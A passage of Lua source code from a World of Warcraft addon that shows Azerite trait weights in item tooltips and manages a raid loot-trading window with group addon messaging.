		local iLvL = GetDetailedItemLevelInfo(itemLink)
		
		--print('Current ilvl', iLvL)

		local numSpecializations = GetNumSpecializations()
		local _, class = UnitClass('player')
		
		local numTiers = #allTierInfo
		
		for i=1, numSpecializations do
			local id, name, description, icon, background, role, primaryStat = GetSpecializationInfo(i)
		
			if ( ns.AzeriteTraitsInfo[class] and ns.AzeriteTraitsInfo[class][id] ) then
				local specIcon = '|T'..icon..':14:14:0:0:64:64:4:60:4:60|t'
		
				local totalNum = 0
				for i=1, #allTierInfo-1 do
					local maxForTier = 0
					for a=1, #allTierInfo[i]["azeritePowerIDs"] do
						
						local spellID = AzeriteTooltip_GetSpellID(allTierInfo[i]["azeritePowerIDs"][a])
						local val = ns.GetAzeriteTraitWeight(spellID, class, id, iLvL)
						
						if ( val and val > maxForTier ) then
							maxForTier = val
						end
					end
					
					totalNum = totalNum + maxForTier
				end
		
				if compareInfo then

					--print('T', compareInfo[id], totalNum,  itemLink)

					if compareInfo[id] > totalNum then
						tooltip:AddDoubleLine(specIcon..name, totalNum..' |TInterface\\petbattles\\battlebar-abilitybadge-weak-small:0|t', 1, 1, 1, 1,0,0)
					elseif compareInfo[id] < totalNum then
						tooltip:AddDoubleLine(specIcon..name, totalNum..' |TInterface\\petbattles\\battlebar-abilitybadge-strong-small:0|t', 1, 1, 1, 0,1,0)
					else
						tooltip:AddDoubleLine(specIcon..name, totalNum, 1, 1, 1, 1,1,1)
					end
				else 
					tooltip:AddDoubleLine(specIcon..name, totalNum, 1, 1, 1, 1,1,1)
				end
			end
		end

		--tooltip:AddLine( tooltip:GetName()..' Eq:'..( tostring(tooltip:IsEquippedItem())  )..' Loc:'..( tostring(location) ) )
	end

	GameTooltip:HookScript("OnTooltipSetItem", function(self)
		local name, link = self:GetItem()
		if not name then return end
		if not ns.db.azeriteTooltipInfoHelp then return end
	
		if C_AzeriteEmpoweredItem.IsAzeriteEmpoweredItemByID(link) then
			AzeriteTooltip_BuildTooltip(link, self, name)
		else 
			local itemID = ns.GetItemID(link)
			
			if ( ns.TrinketsInfo ) then
				TrinketsWeigth_BuildTooltip(self, itemID, link)
			end
		end
	end)

	ItemRefTooltip:HookScript("OnTooltipSetItem", function(self)
		local name, link = self:GetItem()
		if not name then return end
		if not ns.db.azeriteTooltipInfoHelp then return end
		
		if C_AzeriteEmpoweredItem.IsAzeriteEmpoweredItemByID(link) then
			AzeriteTooltip_BuildTooltip(link, self, name)
		else 
			local itemID = ns.GetItemID(link)
			
			if ( ns.TrinketsInfo ) then
				TrinketsWeigth_BuildTooltip(self, itemID, link)
			end
		end
	end)
	
	--[==[
	WorldMapTooltip.ItemTooltip.Tooltip:HookScript('OnTooltipSetItem', function(self)
		local name, link = self:GetItem()
		if not name then return end
		if not ns.db.azeriteTooltipInfoHelp then return end
		
		if C_AzeriteEmpoweredItem.IsAzeriteEmpoweredItemByID(link) then
			AzeriteTooltip_BuildTooltip(link, self, name)
		else 
			local itemID = ns.GetItemID(link)
			
			if ( ns.TrinketsInfo ) then
				TrinketsWeigth_BuildTooltip(self, itemID, link)
			end
		end
	end)
	]==]
	ShoppingTooltip1:HookScript("OnTooltipSetItem", function(self)
		local name, link = self:GetItem()
		if not name then return end
		if not ns.db.azeriteTooltipInfoHelp then return end
		
		if C_AzeriteEmpoweredItem.IsAzeriteEmpoweredItemByID(link) then
			AzeriteTooltip_BuildTooltip(link, self, name)
		else 
			local itemID = ns.GetItemID(link)
			
			if ( ns.TrinketsInfo ) then
				TrinketsWeigth_BuildTooltip(self, itemID, link)
			end
		end
	end)
	ShoppingTooltip2:HookScript("OnTooltipSetItem", function(self)
		local name, link = self:GetItem()
		if not name then return end
		if not ns.db.azeriteTooltipInfoHelp then return end
		
		if C_AzeriteEmpoweredItem.IsAzeriteEmpoweredItemByID(link) then
			AzeriteTooltip_BuildTooltip(link, self, name)
		else 
			local itemID = ns.GetItemID(link)
			
			if ( ns.TrinketsInfo ) then
				TrinketsWeigth_BuildTooltip(self, itemID, link)
			end
		end
	end)
	
	local function FindColor(tier, class, specID, iLvL)
		local maxVal = 0
		
		for k,v in pairs( tier.azeritePowerButtons ) do
			local azeritePowerWeight = ns.GetAzeriteTraitWeight(v:GetSpellID(), class, specID, iLvL)
										
			if ( azeritePowerWeight ) then
				if azeritePowerWeight > maxVal then
					maxVal = azeritePowerWeight
				end
			end
		end
	
		return maxVal
	end
	
	local specButtons = {}
	local weightButtons = {}
	
	local tiersMinMax = {}
			
	local requestedSpec = nil
	local UpdateTraitInfo
	
	local function ChangeToSpec(self)
		for i=1, #specButtons do
			specButtons[i]:SetAlpha(0.3)
		end
		
		self:SetAlpha(1)
			
		requestedSpec = self.specID
				
		UpdateTraitInfo()
	end
	
	local function createTextPowerFrame(v)
		v._customFrame = CreateFrame('Frame', nil, AzeriteEmpoweredItemUI.BorderFrame)
		v._customFrame:SetFrameStrata('DIALOG')
		v._customFrame:SetFrameLevel(v:GetFrameLevel()+10)
		v._customFrame:SetSize(1,1)
		v._customFrame:SetPoint('CENTER', v, 'CENTER', 0, -30)
			
		v._customFrame.text = v._customFrame:CreateFontString()
		v._customFrame.text:SetFont(STANDARD_TEXT_FONT, 14, 'NONE')
		v._customFrame.text:SetShadowColor(0,0,0)
		v._customFrame.text:SetShadowOffset(1, -1)
		v._customFrame.text:SetPoint('CENTER', v._customFrame, 'CENTER', 0, 0)
		v._customFrame.text:SetDrawLayer('OVERLAY', 4)
		
		v._customFrame.tex = v._customFrame:CreateTexture()
		v._customFrame.tex:SetDrawLayer('OVERLAY', 3)
		v._customFrame.tex:SetSize(20,20)
		v._customFrame.tex:SetAllPoints(v._customFrame.text)
		v._customFrame.tex:SetColorTexture(1,0,0,0.5)
		
		weightButtons[#weightButtons+1] = v._customFrame
	end
	
	local function FindSpecWithTraits(class)
		for spec in pairs( ns.AzeriteTraitsInfo[class] ) do
			for spellID in pairs( ns.AzeriteTraitsInfo[class][spec] ) do
				return spec
			end
		end
	end
	
	local lastClass = nil
	
	function UpdateTraitInfo()	
	
		if not ns.db.azeriteTooltipInfoHelp then 
			for i=1, #specButtons do
				specButtons[i]:Hide()
			end
			for i=1, #weightButtons do
				weightButtons[i]:Hide()
			end
			
			return 
		end
		
		
		local self = AzeriteEmpoweredItemUI
		local isPreview = self.azeriteItemDataSource:IsPreviewSource()
		
		--print('T', self.azeriteItemDataSource:GetItem():GetItemLink())
		
		local itemLink = self.azeriteItemDataSource:GetItem():GetItemLink()
		local iLvL = GetDetailedItemLevelInfo(itemLink)
		
		local _, class = UnitClass('player')
		local specID = GetSpecializationInfo(GetSpecialization())
			
		if ( isPreview ) then
			class = ns.GetClassByTraitrs()
			specID = ( class and ns.AzeriteTraitsInfo[class] ) and FindSpecWithTraits(class)
		end
		
		
		if ( lastClass ~= class ) then
			requestedSpec = nil
		end
		
		lastClass = class
		
		if not class then
			for i=1, #specButtons do
				specButtons[i]:Hide()
			end
		else
			local i = 0
			for spec in pairs(ns.AzeriteTraitsInfo[class]) do
				i = i+1
				
				local id, name, _, icon = GetSpecializationInfoByID(spec)
				
				specButtons[i].tx:SetTexture(icon)
				specButtons[i].specID = id
				specButtons[i]:Show()
				
				if ( id == ( requestedSpec or specID ) ) then
					specButtons[i]:SetAlpha(1)
				else
					specButtons[i]:SetAlpha(0.3)
				end
			end		
		end
		
		for tierIndex, tierFrame in ipairs(self.tiersByIndex) do
			tiersMinMax[tierIndex] = tiersMinMax[tierIndex] or {}
		
			local maxVal = FindColor(tierFrame, class, requestedSpec or specID, iLvL)
			
			for k,v in pairs( tierFrame.azeritePowerButtons ) do
			
				if not v._customFrame then
					createTextPowerFrame(v)
				end
				
				
				tiersMinMax[tierIndex][k] = tiersMinMax[tierIndex][k] or {}
				
				if ( class and tierIndex < #self.tiersByIndex ) then				
					local azeritePowerWeight = ns.GetAzeriteTraitWeight(v:GetSpellID(), class, requestedSpec or specID, iLvL)
						
					if ( azeritePowerWeight ) then
						v._customFrame:Show()
					
						if ( maxVal == azeritePowerWeight ) then
							v._customFrame.tex:SetColorTexture(0,1,0,0.5)	
						else
							v._customFrame.tex:SetColorTexture(1,0,0,0.5)	
						end
						
						v._customFrame.text:SetText( azeritePowerWeight or '??' )
						v._customFrame.text:SetTextColor(1,1,1)
					else
						v._customFrame:Hide()
					end
				else
					v._customFrame:Hide()
				end
			end					
		end				
	end
	
	local loader = CreateFrame('Frame')
	loader:RegisterEvent('ADDON_LOADED')
	loader:SetScript('OnEvent', function(self, event, name)
		
		if ( name == 'Blizzard_AzeriteUI' ) then
			--print('Blizzard_AzeriteUI Loaded')
			
			for i=1, 4 do			
				local button = CreateFrame('Button', nil, AzeriteEmpoweredItemUI.BorderFrame)
				button:SetSize(32,32)
				button:SetFrameStrata('DIALOG')
				button:SetFrameLevel(AzeriteEmpoweredItemUI.BorderFrame:GetFrameLevel()+10)
						
				button.tx = button:CreateTexture()
				button.tx:SetDrawLayer('OVERLAY', 3)
				button.tx:SetAllPoints(button)
				button.tx:SetTexture(icon)
				button.tx:SetTexCoord(0.1, 0.9, 0.1, 0.9)
				
				button:SetPoint('TOPRIGHT', AzeriteEmpoweredItemUI, 'TOPRIGHT', (-33 * (i-1)) -10, -30)
				
				if ( id == specID ) then
					button:SetAlpha(1)
				else
					button:SetAlpha(0.3)
				end
				
				button:SetScript('OnClick', ChangeToSpec)
				
				specButtons[#specButtons+1] = button	
			end
			
			hooksecurefunc( 'OpenAzeriteEmpoweredItemUIFromLink', function(itemLink, classID, azeritePowerIDs)
			
				if ( azeritePowerIDs ) then
					for k,v in pairs(azeritePowerIDs) do
				--		print(k,v)
					end
				end	
			end)
		
			hooksecurefunc( AzeriteEmpoweredItemUI, 'SetToItemLink', function(self, itemLink, overrideClassID, overrideSelectedPowersList)
			
			--	print(self, itemLink:gsub('|', '||'), overrideClassID, overrideSelectedPowersList)
			end)
			
			hooksecurefunc( AzeriteEmpoweredItemUI, 'RebuildTiers', function(self)
				UpdateTraitInfo()
			end)
			
		end
	end)
	
end

do
		--	BIND_TRADE_TIME_REMAINING:gsub('%%s', '(.+)')
								
	--[==[
	local b = {}
	
	for i = 0, NUM_BAG_SLOTS do
		b[i] = GetContainerNumSlots(i)	
	end
	
	for i = 0, #b do
		for n = 1, b[i] do
			local texture, itemCount, locked, quality, readable, lootable, itemLink = GetContainerItemInfo(i, n);


	local 
	]==]
	
	RegisterAddonMessagePrefix('LHLSN')

	local throttle = false

	local reopenFrame = true

	local lastBossLooted = nil
	local findedLoot = {}
	local itemsForSearch = {}

	local raid = {}
	local lastEncounter = 0
	local itemsForTrade = {}

	local function FindSessionByID(id)
		local index = false

		for i=1, #itemsForTrade do
			if ( itemsForTrade[i].id == id ) then 
				index = i
			end 
		end

		return index
	end

	local function CreateLootSession(id, name, raid)
		itemsForTrade[#itemsForTrade+1] = {
			id=id,
			items={},
			bossname=name,
			raid= raid and CopyTable(raid),
		}
	end

	
	local function AddToSessionItem(id, owner, item, realName) 
		local session = FindSessionByID(id)

		if ( session ) then
			itemsForTrade[session].items[#itemsForTrade[session].items+1] = {
				item = item,
				name = owner,
				realName = realName,
			}
		else 
		--	print('AddToSessionItem Cant find session for id=', id)
		end
	end 

	local function AddToSessionLootOpenned(id, owner, status, coloredName) 
		local session = FindSessionByID(id)

		if ( session ) then
			if ( itemsForTrade[session].raid ) then
				itemsForTrade[session].raid[owner] = {
					status = status,
					name = coloredName,
				}
			end
		else 
		--	print('AddToSessionLootOpenned Cant find session for id=', id)
		end
	end 

	local function NumToShowOpenned(list)
		local num = 0

		if ( list.raid ) then
			for k,v in pairs(list.raid) do 
				if v == true or v.status == 'w0' then
					num = num + 1
				end
			end
		end 
		return num
	end

	local function LOOT_OPENED()
		wipe(findedLoot)
		
		for i = 1, GetNumLootItems() do
			for n = 1, select("#", GetLootSourceInfo(i)), 2 do
				local GUID = select(n, GetLootSourceInfo(i))

		--		print('Looted ', GUID)
			end 
		end 

		local bossID = ns:GetLootBossID()

		lastBossLooted = bossID 

		--print('Boss Looted', bossID)

		for i=1, GetNumLootItems() do		
			if LootSlotHasItem(i) then
				local texture, item, quantity, quality, locked, isQuestItem, questId, isActive = GetLootSlotInfo(i);
				local link = GetLootSlotLink(i)
				if link then		
					local name, link2, quality, iLevel, reqLevel, class, subclass, maxStack, equipSlot, texture, vendorPrice = GetItemInfo(link)			
					if link2 and quality and ns.db.lootQuality[quality] then
						if ns.GlobalItemIgnore(item, class, subclass) then
				
						else
							local itemlvl = GetDetailedItemLevelInfo(link)

							if itemlvl and itemlvl >= 340 then
								findedLoot[#findedLoot+1] = link
								itemsForSearch[link] = true
							end	
						end
					end
				end	
			end
		end
	end
	
	local function LOOT_CLOSED()
		if not lastBossLooted then
			return 
		end 

		if #findedLoot > 0 then
			ns:SendMessage('w0', 'LHLSN')
		else 
			ns:SendMessage('w1', 'LHLSN')
		end
	end

	local function SendForTrabableItem(itemLink)
		ns:SendMessage(itemLink, 'LHLSN')
	end


	local function ScanForTradableItem()
		throttle = false

		local b = {}
	
		for i = 0, NUM_BAG_SLOTS do
			b[i] = GetContainerNumSlots(i)	
		end
		
		for i = 0, #b do
			for n = 1, b[i] do
				local texture, itemCount, locked, quality, readable, lootable, itemLink = GetContainerItemInfo(i, n);


				if itemsForSearch[itemLink] then
					local res, text = ns.FindInContainers(i, n, BIND_TRADE_TIME_REMAINING:gsub('%%s', '(.+)'))

					if res then
						itemsForSearch[itemLink] = nil

						SendForTrabableItem(itemLink)
					end
				end
			end
		end

		itemsForSearch = {}
	end

	function ns.LootTradingHandler(msg, author, tag)
		local authorShort = strsplit('-', author)

		if raid[authorShort] then
			local status = msg

			if status == 'w0' then
				-- have items
			--	AddToSessionItem(lastEncounter, ns.GetColoredName(author), 'w0') 
			--	AddToSessionLootOpenned(lastEncounter, authorShort, 'w0', ns.GetColoredName(author)) 
			--	ns.LootTrade_SetGroups()
			elseif status == 'w1' then
				-- dont have items
			--	AddToSessionItem(lastEncounter, ns.GetColoredName(author), 'w1')
			--	AddToSessionLootOpenned(lastEncounter, authorShort, 'w1', ns.GetColoredName(author)) 
			--	ns.LootTrade_SetGroups()
			else
			--	print('Can trade', msg, author, authorShort, ns.GetColoredName(author))

				AddToSessionItem(lastEncounter, ns.GetColoredName(author), status, author) 
				ns.LootTrade_SetGroups()
			end
		end
	end
	-- 162460
	
	local frame = CreateFrame('FRAME')
	frame:RegisterEvent('LOOT_OPENED')
	frame:RegisterEvent("LOOT_SLOT_CLEARED");
	frame:RegisterEvent("LOOT_SLOT_CHANGED");
	frame:RegisterEvent("LOOT_CLOSED");
	frame:RegisterEvent("BAG_NEW_ITEMS_UPDATED");
	frame:RegisterEvent('ENCOUNTER_LOOT_RECEIVED');
	frame:RegisterEvent('ENCOUNTER_START');
	frame:RegisterEvent('ENCOUNTER_END');
	frame:SetScript('OnEvent', function(self, event, ...)
		if not IsInGroup() and not IsInRaid() and ns.db.canTradeFrame then
			return
		end

		if event == 'LOOT_OPENED' or event == 'LOOT_SLOT_CLEARED' or event == 'LOOT_SLOT_CHANGED' then
			LOOT_OPENED()
		elseif event == 'LOOT_CLOSED' then
			LOOT_CLOSED()
		elseif event == 'BAG_NEW_ITEMS_UPDATED' then
		
		elseif event == 'ENCOUNTER_END' then
			local encounterID, encounterName, difficultyID, groupSize, success = ...

			if success == 1 then

				lastEncounter = encounterID

				CreateLootSession(encounterID, encounterName) --, ( IsInRaid() and raid or nil ) )

				reopenFrame = true
			end
		elseif event == 'ENCOUNTER_START' then
			local encounterID, encounterName, difficultyID, groupSize = ...

			raid = {}

			if IsInRaid() then
				for i=1, GetNumGroupMembers() do
					if UnitIsVisible('raid'..i) then
						raid[UnitName('raid'..i)] = true 
					end
				end
			elseif IsInGroup() then
				for i=1, GetNumSubgroupMembers() do
					if UnitIsVisible('party'..i) then
						raid[UnitName('party'..i)] = true 
					end
				end
				raid[UnitName('player')] = true 
			end
		elseif ( event == "ENCOUNTER_LOOT_RECEIVED" ) then
			local encounterID, itemID, itemLink, quantity, playerName, className = ...;

			local name = strsplit('-', playerName)
			
			if name ~= UnitName('player') then return end

			itemsForSearch[itemLink] = true

			if not throttle then
				throttle = true
				C_Timer.After(1, ScanForTradableItem)
			end
		end
	end)


	local mover = CreateFrame("Frame", 'LootHelperTestFrame', UIParent)
	--mover:EnableMouse(true)
	mover:SetMovable(true)
	--mover:RegisterForDrag("LeftButton")
	mover:SetPoint("CENTER", UIParent, "CENTER", 0,0)
	mover:SetSize(200, 1)
	--mover:Show()
	--[==[
	mover.bg = mover:CreateTexture()
	mover.bg:SetSize(20,20)
	mover.bg:SetAllPoints(mover)
	mover.bg:SetColorTexture(0,0,0,0.6)
	]==]
	mover:SetScript("OnDragStart", function()
		ns:StartTraderMoving()
	end)
	mover:SetScript("OnDragStop", function()
		ns:StopTraderMoving()
	end)
	--[[
	mover.text = mover:CreateFontString()
	mover.text:SetPoint("CENTER", mover, "CENTER", 0,0)
	mover.text:SetFont(ns.default_font, ns.default_font_size, ns.default_font_outline)
	mover.text:SetText('ClientSide Mover')	
	]]
	function ns:StartTraderMoving()
		mover:StartMoving()
	end
	function ns:StopTraderMoving()
		mover:StopMovingOrSizing()	
		local x, y = mover:GetCenter()
		local ux, uy = UIParent:GetCenter()
		ns.db.TraderMover = { floor(x - ux + 0.5),floor(y - uy + 0.5) }
		ns:UpdateTraderPosition()
	end
	function ns:UpdateTraderPosition()
		mover:ClearAllPoints()
		mover:SetPoint("CENTER", UIParent, "CENTER", ns.db.TraderMover[1] or 0, ns.db.TraderMover[2] or 0)
	end
		
	local MainFrame = CreateFrame('Frame', addOn..'TraderFrame', UIParent); ns.LootTraderFrame = MainFrame
	MainFrame:SetFrameStrata('MEDIUM')
	MainFrame:SetFrameLevel(15)
	MainFrame:SetPoint('TOP', mover, 'TOP', 0, 0)
	MainFrame:SetSize(200, 300)

	local f = CreateFrame("Frame", nil, MainFrame)
	f:SetPoint('CENTER', MainFrame, 'CENTER', 0, 0)
	f:SetSize(200, 300)
	f:SetFrameLevel(MainFrame:GetFrameLevel() + 3)

	MainFrame.Scroll = CreateFrame("ScrollFrame", addOn..'TraderFrameScrollFrame', MainFrame, "UIPanelScrollFrameTemplate")
	MainFrame.Scroll.ScrollBar:SetParent(f)
	
	MainFrame.Scroll.ScrollBar:SetScript('OnValueChanged', function(self, value)
		MainFrame.Scroll:SetVerticalScroll(value);
	end)
	
	MainFrame.Scroll:SetFrameLevel(MainFrame:GetFrameLevel() + 1)
	MainFrame.Scroll:SetSize(180, 268)
	MainFrame.Scroll:SetPoint("TOPRIGHT", MainFrame, "TOPRIGHT", -22, -32)
	
	MainFrame.scrollBox = CreateFrame('Frame', nil, UIParent)
	MainFrame.scrollBox:SetPoint('TOPLEFT', MainFrame.Scroll, "TOPLEFT", 8, 1)
	MainFrame.scrollBox:SetSize(200, 200)

	MainFrame.Scroll:SetScrollChild(MainFrame.scrollBox)
	MainFrame.Scroll:SetHorizontalScroll(-5)
	MainFrame.Scroll:SetVerticalScroll(0)
	MainFrame.Scroll:EnableMouse(true)	
	MainFrame.Scroll:SetClipsChildren(true)

	
	MainFrame.bg = MainFrame:CreateTexture(nil, 'BACKGROUND')
	MainFrame.bg:SetAllPoints()
	ns.CustomSetTexture(MainFrame.bg, 0,0,0,0.7)
	MainFrame.icons = {}
	MainFrame:Hide()
	MainFrame:EnableMouse(true)
	MainFrame:RegisterForDrag("LeftButton")
	MainFrame:SetScript("OnDragStart", function() ns:StartTraderMoving() end)
	MainFrame:SetScript("OnDragStop", function() ns:StopTraderMoving() end)
	MainFrame:SetScript('OnShow', function() ns:UpdateTraderPosition() end)

	MainFrame.close = CreateFrame("Button", nil, MainFrame, 'UIPanelCloseButton')
	MainFrame.close:SetFrameLevel(MainFrame:GetFrameLevel()+5)
	MainFrame.close:SetSize(32, 32)	
	MainFrame.close:SetPoint("TOPRIGHT", MainFrame, "TOPRIGHT", 5, 5)	

	MainFrame.close:SetScript("OnClick", function() 
		MainFrame:Hide()
		
		reopenFrame = false
	end)

	MainFrame.reset = CreateFrame("Button", nil, MainFrame.close)
	MainFrame.reset:SetFrameLevel(MainFrame.close:GetFrameLevel()+5)
	MainFrame.reset:SetSize(62, 32)	
	MainFrame.reset:SetPoint("RIGHT", MainFrame.close, "LEFT", 0, 0)
	MainFrame.reset:SetScript('OnClick', function()
		wipe(itemsForTrade)
		ns.LootTrade_SetGroups()
	end)
	MainFrame.text = MainFrame.reset:CreateFontString()
	MainFrame.text:SetFont(STANDARD_TEXT_FONT, 12, 'OUTLINE')
	MainFrame.text:SetPoint('CENTER', MainFrame.reset,'CENTER', 0, 0)
	MainFrame.text:SetText(L['RESET'])
	
	MainFrame.header = MainFrame:CreateFontString()
	MainFrame.header:SetFont(STANDARD_TEXT_FONT, 12, 'OUTLINE')
	MainFrame.header:SetPoint('TOPLEFT', MainFrame,'TOPLEFT', 5, -5)
	MainFrame.header:SetText(L['CAN_TRADE_FRAME'])
	
	MainFrame.rows = {}
	MainFrame.groups = {}

	function ns.OpenTraderFrame()
		if ( ns.db.canTradeFrame ) then
			MainFrame:Show()
			ns:UpdateTraderPosition()
		end
	end

	local function addRow()
		for i=1, #MainFrame.rows do 
			if MainFrame.rows[i].free then
				return MainFrame.rows[i]
			end
		end

		local frame = CreateFrame('Frame', nil, MainFrame.scrollBox)
		frame:SetSize(200, 18)

		frame.free = true 
		--[==[
		local bg = frame:CreateTexture()
		bg:SetAllPoints()
		bg:SetColorTexture(1, 0, 0, 0.5)
		]==]

		frame.trade = CreateFrame('Frame', nil, frame)
		frame.trade:SetSize(18, 18)
		frame.trade:SetPoint('LEFT', frame, 'LEFT', 4, 0)

		frame.trade.tx = frame.trade:CreateTexture()
		frame.trade.tx:SetAllPoints()
	
		frame.icon = CreateFrame('Button', nil, frame)
		frame.icon:SetSize(18, 18)
		frame.icon:SetPoint('LEFT', frame.trade, 'RIGHT', 4, 0)

		frame.icon:RegisterForClicks("AnyUp");
		frame.icon:SetScript("OnEnter", ns.SetItemTip)
		frame.icon:SetScript("OnLeave", ns.HideTip2)
	--	button:SetScript("OnUpdate", ItemOnUpdate)
		frame.icon:SetScript("OnClick", ns.LootClick)
		frame.icon:SetScript('OnEvent', ns.SetItemTip)

		frame.icon.tx = frame.icon:CreateTexture()
		frame.icon.tx:SetAllPoints()
		
		frame.owner = frame:CreateFontString()
		frame.owner:SetFont(STANDARD_TEXT_FONT, 12, 'OUTLINE')
		frame.owner:SetPoint('LEFT', frame.icon,'RIGHT', 2, 0)
		
		MainFrame.rows[#MainFrame.rows+1] = frame

		return frame
	end

	local function AddGroup()
		for i=1, #MainFrame.groups do 
			if MainFrame.groups[i].free then
				return MainFrame.groups[i]
			end
		end

		local frame = CreateFrame('Frame', nil, MainFrame.scrollBox)
		frame:SetSize(200, 18)
		--[==[
		local bg = frame:CreateTexture()
		bg:SetAllPoints()
		bg:SetColorTexture(1, 1, 0, 0.5)
		]==]
		frame.free = true 

		frame.expand = CreateFrame('Button', nil, frame)
		frame.expand:SetSize(18, 18)
		frame.expand:SetPoint('TOPLEFT', frame, 'TOPLEFT', 2, -2)

		frame.bossname = frame:CreateFontString(nil, 'OVERLAY')
		frame.bossname:SetFont(STANDARD_TEXT_FONT, 12, 'OUTLINE')
		frame.bossname:SetPoint('LEFT', frame.expand,'RIGHT', 2, 0)

		frame.bossname.tx = frame:CreateTexture(nil, 'OVERLAY')
		frame.bossname.tx:SetPoint('TOP', frame.bossname, 'TOP', 0, 3)
		frame.bossname.tx:SetPoint('BOTTOM', frame.bossname, 'BOTTOM', 0, -3)
		frame.bossname.tx:SetPoint('LEFT', MainFrame, 'LEFT', 0, 0)
		frame.bossname.tx:SetPoint('RIGHT', MainFrame, 'RIGHT', 0, 0)
		frame.bossname.tx:SetColorTexture(0.2, 0.2, 0.2, 1)

		frame.childs = {}

		MainFrame.groups[#MainFrame.groups+1] = frame

		return frame
	end

	local prevgroup = nil 
	
	function ns.LootTrade_SetGroups()
		for i=1, #MainFrame.groups do
			MainFrame.groups[i].free = true
			MainFrame.groups[i]:Hide()

			for a=1, #MainFrame.groups[i].childs do
				MainFrame.groups[i].childs[a].free = true
				MainFrame.groups[i].childs[a]:Hide()
			end

			wipe(MainFrame.groups[i].childs)
		end

		prevgroup = nil

		for i=1, #itemsForTrade do 

		--	print('grp', i, itemsForTrade[i].id, itemsForTrade[i].bossname, #itemsForTrade[i].items )
			local groupFrame
			local numToShow = NumToShowOpenned(itemsForTrade[i])

			if #itemsForTrade[i].items > 0 or numToShow > 0 then
		
				groupFrame = AddGroup()

				groupFrame.free = false
				groupFrame.bossname:SetText(itemsForTrade[i].bossname or GetInstanceInfo() or UNKNOWN)
				groupFrame:ClearAllPoints()
				groupFrame:SetHeight(20)
				groupFrame:Show()

				if ( prevgroup ) then 
					groupFrame:SetPoint('TOP', prevgroup, 'BOTTOM', 0, -20)
				else
					groupFrame:SetPoint('TOP', MainFrame.scrollBox, 'TOP', 0, 0)
				end

				
				ns.OpenTraderFrame()

				prevgroup = groupFrame
			end
			
			if #itemsForTrade[i].items > 0 then
				ns.LootTrade_SetRows(groupFrame, itemsForTrade[i].items)
			end

			if numToShow > 0 then
				ns.LootTrade_SetRows_Openned(groupFrame, itemsForTrade[i].raid)
			end
		end
	end

	function ns.LootTrade_SetRows(parent, group)
		
		local index = 0

		
		for i=1, #group do
			index = index + 1

			local row = addRow()
			local itemID, itemType, itemSubType, _, icon = GetItemInfoInstant(group[i].item)

			parent.childs[#parent.childs+1] = row

			--print('row', i, itemID, group[i].item, group[i].name )
			row.free = false
			row:ClearAllPoints()

			if not parent.childs[#parent.childs-1] then
				row:SetPoint('TOP',parent,'TOP',0, -20)
			else
				row:SetPoint('TOP',parent.childs[#parent.childs-1],'BOTTOM',0, 0)
			end

			if ( group[i].traded ) then 
				row.trade.tx:SetTexture('Interface\\RaidFrame\\ReadyCheck-Ready')
				--Interface\\RaidFrame\\ReadyCheck-Ready
			else 
				row.trade.tx:SetTexture('Interface\\RaidFrame\\ReadyCheck-Waiting')
				--Interface\\RaidFrame\\ReadyCheck-Waiting
			end 

			row.owner:SetText(group[i].name)
			row.icon.link = group[i].item
			row.icon.tx:SetTexture(icon)
			row.icon:Show()
			row:Show()

			parent:SetHeight(30 + 20*(#parent.childs-1) )
		end
	end


	function ns.LootTrade_SetRows_Openned(parent, group)
		
		local index = 0

		for k,v in pairs(group) do
			if v == true or ( v and v.status == 'w0' ) then 
				index = index + 1

				local row = addRow()

				parent.childs[#parent.childs+1] = row

				row.free = false
				row:ClearAllPoints()

				if not parent.childs[#parent.childs-1] then
					row:SetPoint('TOP',parent,'TOP',0, -20)
				else
					row:SetPoint('TOP',parent.childs[#parent.childs-1],'BOTTOM',0, 0)
				end 

				if v == true then 
					row.owner:SetText((ns.GetColoredName(k) or k)..' - not open')
				elseif v and v.status == 'w0' then 
					row.owner:SetText(v.name..' - have items')
				elseif v and v.status == 'w1' then 
					row.owner:SetText(v.name..' - dont have items')
				end

				row.icon.link = nil
				row.icon:Hide()
				row:Show()

				parent:SetHeight(30 + 20*(#parent.childs-1) )
			end
		end
	end

	function ns.LootTrading(info, author)
	
		local lootData = { strsplit('\n', info) }
	
		local name       = lootData[1]
		local class      = lootData[2]
		local link       = lootData[3]
		local buttonID   = lootData[4]
		local randIndex  = lootData[5]
		local bossID	 = lootData[6]

		--print('T', lootData[7], lootData[8], lootData[9])
		
		local rollID 	 = nil 
		local itemType = 'NORMAL'
	
		if IsArtifactRelicItem(link) then
			itemType = 'RELIC'
		elseif ns.IsTokenItem(link) then 
			itemType = 'TOKEN'
		end
		
		if buttonID == 'TRADE' then
			for k, v in pairs(itemsForTrade) do
				for index, item in pairs(itemsForTrade[k].items) do
					if item.realName == author and item.item == link then 
						itemsForTrade[k].items[index].traded = true

						ns.LootTrade_SetGroups()
					end
				end
			end
		end
	end
end
